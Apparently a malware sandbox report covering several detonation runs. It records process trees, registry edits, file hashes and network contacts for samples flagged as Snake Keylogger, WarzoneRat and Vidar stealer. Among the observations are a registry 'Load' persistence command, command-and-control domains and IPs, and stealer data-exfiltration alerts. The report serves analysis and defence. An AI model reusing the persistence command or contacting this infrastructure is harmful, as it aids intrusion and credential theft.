C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
"C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe"
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | cskbtr.atspace.co.uk | udp |
| N/A | 185.176.43.84:80 | cskbtr.atspace.co.uk | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | dd0ee56841e535a3a3ae7c20c32de9cd |
| SHA1 | fc1ea172fd3c67a00e37f930f7595784fc0d1f84 |
| SHA256 | 8649df38276968d1417ec064360339610ff644491c87eb8ac2b2e67e7cbe47c9 |
| SHA512 | ee6a7982e194a5a24f5bd596d1ad6582defcababa19ea8011ba71ead2ee8945dce9f5af56e47b088c16ca00cb6c7225cc18b9b6f026e623283c0e02f9bed524e |
memory/3796-121-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | dd0ee56841e535a3a3ae7c20c32de9cd |
| SHA1 | fc1ea172fd3c67a00e37f930f7595784fc0d1f84 |
| SHA256 | 8649df38276968d1417ec064360339610ff644491c87eb8ac2b2e67e7cbe47c9 |
| SHA512 | ee6a7982e194a5a24f5bd596d1ad6582defcababa19ea8011ba71ead2ee8945dce9f5af56e47b088c16ca00cb6c7225cc18b9b6f026e623283c0e02f9bed524e |
memory/3796-125-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_20df\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_20df | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\Moniker = "oice_16_974fa576_32c1d314_20df" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_20df | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\STORAGE\OICE_16_974FA576_32C1D314_20DF\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\MAPPINGS\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\DisplayName = "OICE_16_974FA576_32C1D314_20DF" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\{A8E66957-32CD-4406-B0B7-F3D3FA03E52B}\abdtfhghgdghghœ.ScT:Zone.Identifier | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 364 wrote to memory of 3904 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
| PID 364 wrote to memory of 3904 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf" /o ""
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE" C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Network
Files
memory/364-114-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-115-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-116-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-117-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-119-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-118-0x00007FFDC44E0000-0x00007FFDC7003000-memory.dmp
memory/364-122-0x00007FFDBDFC0000-0x00007FFDBF0AE000-memory.dmp
memory/364-123-0x00007FFDBC0C0000-0x00007FFDBDFB5000-memory.dmp
memory/3904-316-0x0000000000000000-mapping.dmp
memory/3904-326-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/3904-329-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/3904-332-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_20df\AC\Temp\FL4433.tmp
| MD5 | dc463992c2f659be85d40eb3b8991b4b |
| SHA1 | 6de672e23630e3d58225a77b9d09dd70df680947 |
| SHA256 | fcfd5799afb5acc6cab4737f03a3583f8cf94073f498cdca7a4bf8c9cd1fb340 |
| SHA512 | 959b6f6ccb190f5bf1cd3f6a68e0b151b9dc6d3247104423ff0cba5fdf9c529999419865cdab96bdd9c56c19cea80ac0c2753fca7dd5671d8d7c028df183d0e6 |
memory/3904-361-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:34
Platform
win7v20210408
Max time kernel
131s
Max time network
199s
Command Line
Signatures
Snake Keylogger
WarzoneRat, AveMaria
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1076 set thread context of 332 | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe |
| PID 1524 set thread context of 948 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 472 set thread context of 1588 | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
"C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe"
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe
"C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe"
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
memory/1076-60-0x0000000000290000-0x0000000000291000-memory.dmp
memory/1076-62-0x0000000005070000-0x0000000005071000-memory.dmp
memory/1076-63-0x0000000005075000-0x0000000005086000-memory.dmp
memory/1076-64-0x0000000002070000-0x00000000020BC000-memory.dmp
memory/1076-69-0x00000000048F0000-0x0000000004953000-memory.dmp
memory/332-70-0x0000000000400000-0x000000000055E000-memory.dmp
memory/332-71-0x0000000000405E28-mapping.dmp
memory/332-72-0x0000000075AA1000-0x0000000075AA3000-memory.dmp
memory/332-73-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1472-74-0x0000000000000000-mapping.dmp
memory/1524-76-0x0000000000000000-mapping.dmp
memory/1836-77-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/1524-80-0x0000000000880000-0x0000000000881000-memory.dmp
memory/1524-82-0x00000000044A0000-0x00000000044A1000-memory.dmp
memory/1524-83-0x00000000044A5000-0x00000000044B6000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/948-92-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/948-95-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/996-97-0x0000000000000000-mapping.dmp
memory/996-98-0x00000000000B0000-0x00000000000B1000-memory.dmp
memory/948-99-0x00000000037C0000-0x00000000038C0000-memory.dmp
\Users\Admin\AppData\Roaming\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/472-101-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/472-104-0x00000000010B0000-0x00000000010B1000-memory.dmp
memory/472-106-0x0000000000470000-0x0000000000471000-memory.dmp
memory/472-107-0x0000000000AC0000-0x0000000000B0A000-memory.dmp
memory/472-112-0x0000000004FA0000-0x0000000005012000-memory.dmp
\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1588-116-0x0000000000400000-0x0000000000426000-memory.dmp
memory/1588-117-0x000000000042010E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1588-120-0x0000000000400000-0x0000000000426000-memory.dmp
memory/472-122-0x0000000000475000-0x0000000000486000-memory.dmp
memory/1588-123-0x00000000049D0000-0x00000000049D1000-memory.dmp
memory/948-124-0x0000000004850000-0x000000000549A000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
Analysis: behavioral28
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win7v20210408
Max time kernel
150s
Max time network
182s
Command Line
Signatures
Vidar
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
